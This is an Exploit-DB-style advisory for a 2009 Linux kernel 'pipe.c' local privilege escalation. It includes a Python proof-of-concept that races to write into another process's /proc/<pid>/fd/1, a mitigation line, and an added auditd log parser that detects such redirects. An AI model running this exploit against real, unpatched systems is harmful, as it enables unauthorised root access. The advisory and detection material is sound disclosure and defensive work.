Vendor: N/A
By: Matthew Bergin
CVSS: 7.2 (HIGH)
Privilege Escalation
CWE: 264
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2009

Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability

This is a PoC based on the PoC released by Earl Chew (updated by Brian Peters). It uses a race condition to exploit a vulnerability in the Linux kernel's 'pipe.c' file. The exploit loops continuously, checking for an active PID, and then runs the shell command 'echo n > /proc/[pid]/fd/1' against that PID to trigger the fault.

Mitigation:

Apply the latest security patches to the Linux kernel.

Exploit-DB raw data:

# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID:       36901
#
# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files

# Python 2 script (print statement, str results from subprocess).
import os
import time
import random
import subprocess

# infinite loop: i and x are never changed, so neither while condition ever fails
i = 0
x = 0
while (i == 0):
    os.system("sleep 1")
    while (x == 0):
        time.sleep(random.random())  # random float 0.0-1.0
        # grab the PID column (field 4 of ps -elf) of any 'sleep 1' process
        p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"],
                             stdout=subprocess.PIPE, shell=True)
        result = p.stdout.read()
        pid = result.replace('\n', '').replace('\r', '')
        if (pid == "0"):  # need an active pid, race condition applies
            print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
            break
        else:
            print "[+] PID: " + pid
            loc = "echo n > /proc/" + pid + "/fd/1"
            os.system(loc)  # triggers the fault, runs via sh
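As an added detection example (not part of the Exploit-DB record or the PoC above), the trigger the PoC issues is `sh -c "echo n > /proc/<pid>/fd/1"` via os.system(), which an auditd execve rule records as an EXECVE event with the command line hex-encoded, as auditd does for arguments containing spaces. The function below decodes such records and flags command lines that redirect output into another process's /proc/<pid>/fd/<n>; the log lines are constructed for this example, and the record format is assumed to follow the standard auditd EXECVE layout.

```python
import re

# Constructed auditd EXECVE records for this example (not real captures).
# auditd hex-encodes an argument that contains spaces or quotes, so the
# command line handed to "sh -c" by os.system() appears as a hex string.
SAMPLE_LOG = """\
type=EXECVE msg=audit(1257600000.101:501): argc=2 a0="sleep" a1="1"
type=EXECVE msg=audit(1257600000.102:502): argc=3 a0="sh" a1="-c" a2=6563686F206E203E202F70726F632F313233342F66642F31
type=EXECVE msg=audit(1257600000.103:503): argc=3 a0="sh" a1="-c" a2=6C73202D6C202F70726F632F313233342F6664
"""

# aN="quoted value" or aN=HEXSTRING
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
# output redirection into another process's /proc/<pid>/fd/<n> entry
REDIRECT_RE = re.compile(r'>\s*/proc/(\d+)/fd/\d+')
SERIAL_RE = re.compile(r'audit\([^:]+:(\d+)\)')


def decode_args(line):
    """Return argv for one EXECVE record, decoding hex-encoded fields."""
    argv = []
    for m in ARG_RE.finditer(line):
        idx, quoted, hexed = int(m.group(1)), m.group(2), m.group(3)
        value = quoted if quoted is not None else bytes.fromhex(hexed).decode("utf-8", "replace")
        argv.append((idx, value))
    return [value for _, value in sorted(argv)]


def find_procfd_redirects(log_text):
    """Return (audit serial, target pid, command) for each 'sh -c' command
    line that redirects into /proc/<pid>/fd/<n>; plain reads of /proc
    (such as the 'ls -l /proc/1234/fd' sample) are not reported."""
    hits = []
    for line in log_text.splitlines():
        if "type=EXECVE" not in line:
            continue
        argv = decode_args(line)
        if len(argv) < 3 or argv[1] != "-c":
            continue
        m = REDIRECT_RE.search(argv[2])
        if m:
            hits.append((SERIAL_RE.search(line).group(1), m.group(1), argv[2]))
    return hits


if __name__ == "__main__":
    for serial, pid, cmd in find_procfd_redirects(SAMPLE_LOG):
        print("audit serial %s: shell redirect into /proc/%s: %s" % (serial, pid, cmd))
```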